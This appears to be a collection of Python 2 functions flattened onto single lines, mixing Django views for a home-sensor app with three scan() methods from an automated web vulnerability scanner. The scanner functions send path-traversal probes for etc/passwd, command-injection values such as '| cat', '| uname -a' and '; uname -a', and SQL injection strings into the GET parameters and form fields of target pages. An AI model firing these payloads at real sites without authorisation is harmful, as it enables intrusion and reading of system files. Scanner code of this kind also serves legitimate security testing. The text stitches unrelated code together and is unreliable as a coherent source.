def new_group(request): if request.method == 'POST': form = GroupForm(request.POST) if form.is_valid(): group_code = helper.post_request("https://a6.cfapps.io/groups", {}) groupID = json.loads(group_code)['groupId'] group = Group.objects.create(code=groupID, name=form.cleaned_data['name']) group.save() #Create a new subscription for group url = "https://a6.cfapps.io/subscriptions" payload = {} payload['groupId'] = group.code payload['insights'] = [ "home.window.open", "home.window.closed", "home.garage.open", "home.garage.closed", "home.smoke.alarm_on", "home.smoke.alarm_off", "home.smoke.alarm_battery_low", "home.fire.alarm_on", "home.fire.alarm_off", "home.water.sensor.alarm_on", "home.water.sensor.alarm_off", "vehicle.trip.arrived", "vehicle.health.arrived"] payload['webhookUrl'] = 'https://homesensing.cfapps.io/callback' result = helper.post_request(url, payload) print result return HttpResponseRedirect("/index") else: form = GroupForm() return render_to_response('new_group.html', { 'form' : form }, context_instance=RequestContext(request))
def scan(self): results = [] cache = [] for web_page in self.pages: http = httplib2.Http() status, response = http.request(web_page) parsed = urlparse(web_page) # handle scan for get params if parsed.query: # print("testing page: " + web_page) payloads = self.prepare_params(parsed.query, 30, "etc/passwd") for payload in payloads: url = parsed.scheme + "://" + parsed.hostname + parsed.path + "?" + payload new_status, new_response = http.request(url) parsed_response = new_response.splitlines() if new_status.status == requests.codes.ok: #if int(new_status['content-length']) > int(status['content-length']): if self.has_passwd_content(parsed_response): # print("vulnerable url: " + url + "\n") if not self.in_cache(cache, url): results.append((urlparse(url).path, create_get_params(url), "GET")) cache.append(url) break break # handle scan for post php forms if has_form(response): forms = parse_form(response) action = get_form_action(response) if action != None: web_page = web_page.rsplit('/', 1)[0] + "/" + action original_response = post_request(web_page, forms) injection_forms = [] paths = self.prepare_paths(30, "etc/passwd") for path in paths: for form_input in forms: injection_forms.append((form_input[0], "| cat " + path)) new_response = post_request(web_page, injection_forms) parsed_response = new_response.splitlines() #if len(new_response) > len(original_response): # That means that the webpage is different, possibly a successful case if self.has_passwd_content(parsed_response): results.append((urlparse(web_page).path, create_post_params(injection_forms), "POST")) break self.logs = log_results(self.url, results, EXPLOIT_CLASS)
def scan(self): results = [] get_param_pages = Set([]) for web_page in self.web_pages: http = httplib2.Http() status, response = http.request(web_page) if has_form(response): forms = parse_form(response) original_response = post_request(web_page, forms) injection_forms = [] for form_input in forms: if form_input[ 0] == "csrftoken": # We don't have incentive to change this injection_forms.append(form_input) else: injection_forms.append((form_input[0], "| uname -a")) new_response = post_request(web_page, injection_forms) parsed_response = new_response.splitlines() if self.has_uname_content(parsed_response): results.append( (urlparse(web_page).path, create_post_params(injection_forms), "POST")) elif has_get_params(web_page) and urlparse( web_page).path not in get_param_pages: parsed_web_page = urlparse(web_page) get_param_pages.add(parsed_web_page.path) param_list = map(lambda x: x.split("="), parsed_web_page.query.split("&")) # original_response = get_request(web_page) # random_param_query = "?" + "&".join(map(lambda param: param[0] + "=" + urllib.quote("slkdfjsldk") ,param_list)) # random_url = parsed_web_page.scheme + "://" + parsed_web_page.netloc + parsed_web_page.path + random_param_query # random_response = get_request(random_url) malicious_params = [] for param in param_list: malicious_params.append((param[0], "; uname -a")) malicious_param_query = "?" + "&".join( map( lambda malicious_param: malicious_param[0] + "=" + urllib.quote(malicious_param[1]), malicious_params)) malicious_url = parsed_web_page.scheme + "://" + parsed_web_page.netloc + parsed_web_page.path + malicious_param_query malicious_response = get_request(malicious_url) # if malicious_response != original_response and malicious_response != random_response: # That means that the webpage is different, possibly a successful case if self.has_uname_content(malicious_response): results.append((urlparse(web_page).path, create_get_params(malicious_url), "GET")) self.logs = log_results(self.url, results, EXPLOIT_CLASS)
def new_sensor(request, name): group = Group.objects.get(name=name) if request.method == 'POST': form = SensorForm(request.POST) if form.is_valid(): payload = {} payload['sensorType'] = form.cleaned_data['sensorType'] payload['zipCode'] = form.cleaned_data['zipCode'] url = "https://a6.cfapps.io/groups/" + str(group.code) + "/sensors" result = json.loads(helper.post_request(url, {})) print result s = Sensor.objects.create(group_id=group.id, name=form.cleaned_data['name'], sensorType=payload['sensorType'], zipCode=payload['zipCode'], code=result['sensorId']) s.save() return HttpResponseRedirect("/group/"+group.name) else: form = SensorForm() return render_to_response('new_sensor.html', { 'form' : form, 'group_name': group.name }, context_instance=RequestContext(request))
def scan(self): results = [] get_param_pages = Set([]) for web_page in self.pages: http = httplib2.Http() status, response = http.request(web_page) if has_form(response): forms = parse_form(response) original_response = post_request(web_page, forms) random_forms = [] for form_input in forms: if form_input[ 0] == "csrftoken": # We don't have incentive to change this random_forms.append(form_input) else: random_forms.append((form_input[0], "absldkjf")) random_response = post_request(web_page, random_forms) sql_exploit_file = open(SQL_EXPLOIT_LIST, "r") sql_exploit_list = [ x.strip() for x in sql_exploit_file.readlines() ] for exploit in sql_exploit_list: malicious_forms = [] for form_input in forms: if form_input[ 0] == "csrftoken": # We don't have incentive to change this malicious_forms.append(form_input) else: malicious_forms.append((form_input[0], exploit)) new_response = post_request(web_page, malicious_forms) if original_response != new_response and new_response != random_response: # That means that the webpage is different, possibly a successful case results.append( (urlparse(web_page).path, create_post_params(malicious_forms), "POST")) break elif has_get_params(web_page) and urlparse( web_page).path not in get_param_pages: # GET version parsed_web_page = urlparse(web_page) get_param_pages.add(parsed_web_page.path) param_list = map(lambda x: x.split("="), parsed_web_page.query.split("&")) original_response = get_request(web_page) random_param_query = "?" + "&".join( map( lambda param: param[0] + "=" + urllib.quote( "slkdfjsldk"), param_list)) random_url = parsed_web_page.scheme + "://" + parsed_web_page.netloc + parsed_web_page.path + random_param_query random_response = get_request(random_url) malicious_params = [] sql_exploit_file = open(SQL_EXPLOIT_LIST, "r") sql_exploit_list = [ x.strip() for x in sql_exploit_file.readlines() ] for exploit in sql_exploit_list: malicious_params = [] for param in param_list: malicious_params.append((param[0], exploit)) malicious_param_query = "?" + "&".join( map( lambda malicious_param: malicious_param[ 0] + "=" + urllib.quote(malicious_param[1]), malicious_params)) malicious_url = parsed_web_page.scheme + "://" + parsed_web_page.netloc + parsed_web_page.path + malicious_param_query malicious_response = get_request(malicious_url) if malicious_response != original_response and malicious_response != random_response: # That means that the webpage is different, possibly a successful case results.append( (urlparse(web_page).path, create_get_params(malicious_url), "GET")) self.logs = log_results(self.url, results, EXPLOIT_CLASS)